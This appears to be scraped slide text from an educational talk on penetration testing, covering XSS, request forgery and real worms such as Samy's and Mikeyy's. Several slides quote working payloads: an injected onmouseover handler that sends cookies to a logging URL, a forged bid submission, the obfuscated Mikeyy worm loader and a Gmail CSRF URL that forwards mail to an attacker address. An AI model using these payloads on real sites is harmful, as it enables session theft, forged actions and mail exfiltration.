2. What, why and how’s ofPenetration Testing - AmitDhakad Developer
3. What do I plan to cover? What is Penetration Testing? XSS What is it? Types of XSS Reflective XSS Stored XSS Request Forgery What is it? Types of Request Forgery On-site request forgery Cross-site request forgery Demo Attack mechanisms Real world examples Why do we need to pay attention?
11. Attack:Image url is set tohttp://www.myflorida.org.uk/images/disney_gif/Donald.gif"onmouseover="window.location.href=('http://localhost:3000/log?message='+document.cookie)
14. Attack with XSS:Image url is set tohttp://www.myflorida.org.uk/images/disney_gif/Donald.gif“ onmouseover="var form=document.getElementById('new_bid'); form.bid_amount.value=100;form.submit();
17. Same origin policy A page residing on one domain can cause an arbitrary request to be made to another domain, but it cannot itself process the data returned from that request. A page residing on one domain can load a script from another domain and execute this within its own context.
18. What can you do with XSS and Request Forgery? Session hijacking Performing arbitrary actions Disclosure of user data
20. MySpace worm by Samy (XSS + OSRF) Bypassed all filters and added a script to his profile The script did two things: Added the visiting user as a friend The script got copied into the user’s profile Anyone visiting the new infected user also got added as Samy’s friend.
21.
22. MySpace strips out the word "onreadystatechange" which is necessary for XML-HTTP requests
25. Mikeyy twitter worm (XSS + OSRF) Implemented by a 17-year old boy "><title><script>document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,115,116,97,108,107,100,97,105,108,121,46,99,111,109,47,97,106,97,120,46,106,115,34,62,60,47,115,99,114,105,112,116,62));</script> -- "<script src="http://www.stalkdaily.com/ajax.js"></script>" Visiting user got infected Infected users began twitting unwittingly.
26. Gmail vulnerability – discovered by PetkoPetkov (CSRF) http://www.gnucitizen.org/util/csrf?_method=POST&_enctype=multipart/form-data&_action=https%3A//mail.google.com/mail/h/ewt1jmuj4ddv/%3Fv%3Dprf&cf2_emc=true&cf2_email=evilinbox@mailinator.com&cf1_from&cf1_to&cf1_subj&cf1_has&cf1_hasnot&cf1_attach=true&tfi&s=z&irf=on&nvp_bu_cftb=Create%20Filter Add filter to forward all emails to the attacker’s email address
27. Why we need to pay attention? Shift is towards attacking clients Technologies don’t provide strong protection Considered as lame attacks Identification using automated tools is difficult Penetration testing is considered as a separate vertical